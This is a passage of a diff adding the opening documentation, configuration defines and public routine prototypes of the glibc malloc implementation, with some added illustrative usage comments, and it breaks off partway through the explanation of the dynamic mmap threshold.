+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
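+
+/* Worked example (an illustration, assuming the usual x86-64 values
+   MALLOC_ALIGNMENT == 16, SIZE_SZ == 8, MINSIZE == 32):
+
+     malloc (24)  -> request2size (24) == 32  -> csize2tidx (32) == 0
+     malloc (25)  -> request2size (25) == 48  -> csize2tidx (48) == 1
+     tidx2usize (0)  == 24    (largest request served from tcache bin 0)
+     tidx2usize (63) == 1032  (== MAX_TCACHE_SIZE with 64 bins)
+
+   which matches the per-bin byte ranges listed above.  */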
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option that prevents
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
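+
+/* Illustrative sketch, not part of the glibc sources: because __morecore
+   is an exported, writable function pointer in this glibc version, an
+   application can install its own core allocator before the first
+   allocation.  Returning MORECORE_FAILURE (0 above, i.e. NULL) makes
+   malloc fall back to the mmap path described later in this file.
+   The function name below is hypothetical.
+
+   #include <malloc.h>    // declares __morecore
+   #include <stddef.h>    // ptrdiff_t
+
+   static void *no_sbrk (ptrdiff_t increment)
+   {
+     return NULL;         // never extend the heap via sbrk
+   }
+
+   // Very early in main(), before any allocation:
+   //   __morecore = no_sbrk;
+*/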
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
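+
+/* Illustrative sketch, not part of the glibc sources: the semantics
+   described above from the caller's point of view (the function name is
+   hypothetical).
+
+   #include <stdlib.h>
+   #include <string.h>
+
+   static char *grow_buffer (void)
+   {
+     char *buf = realloc (NULL, 16);      // NULL old pointer: acts as malloc
+     if (buf == NULL)
+       return NULL;
+     strcpy (buf, "hello");
+
+     char *bigger = realloc (buf, 4096);  // may move; contents are preserved
+     if (bigger == NULL)
+       return buf;                        // on failure the old block survives
+     return bigger;
+   }
+*/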
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
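+
+/* Illustrative sketch, not part of the glibc sources: reading a few of the
+   fields described above (the function name is hypothetical; the fields
+   are plain ints, hence %d).
+
+   #include <malloc.h>
+   #include <stdio.h>
+
+   static void report_heap_usage (void)
+   {
+     struct mallinfo mi = mallinfo ();
+     printf ("arena    (non-mmapped system bytes) = %d\n", mi.arena);
+     printf ("ordblks  (free chunks)              = %d\n", mi.ordblks);
+     printf ("fsmblks  (bytes in fastbins)        = %d\n", mi.fsmblks);
+     printf ("uordblks (allocated bytes)          = %d\n", mi.uordblks);
+     printf ("keepcost (trimmable top bytes)      = %d\n", mi.keepcost);
+   }
+*/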
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
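+
+/* Illustrative sketch, not part of the glibc sources: a typical call site
+   for the routine described above (the function name is hypothetical).
+
+   #include <malloc.h>
+   #include <stdio.h>
+
+   static void release_unused_heap (void)
+   {
+     // Keep about 1 MiB of slack at the top of the heap for future
+     // requests; a return value of 1 means memory was actually released.
+     if (malloc_trim (1024 * 1024) == 1)
+       fputs ("heap trimmed\n", stderr);
+   }
+*/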
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
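+
+/* Worked out for the common cases: with SIZE_SZ == 4 (32-bit) the default
+   is 64 * 4 / 4 = 64 request bytes, and with SIZE_SZ == 8 (64-bit) it is
+   64 * 8 / 4 = 128 request bytes, matching the "64 (for 32bit), 128 (for
+   64bit)" default listed in the option summary above.  */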
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than the page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
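+
+/* Worked out: 512 * 1024 = 512 KiB on 32-bit platforms, and
+   4 * 1024 * 1024 * sizeof (long) = 32 MiB on typical 64-bit (LP64)
+   platforms where sizeof (long) == 8.  */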
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86; at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
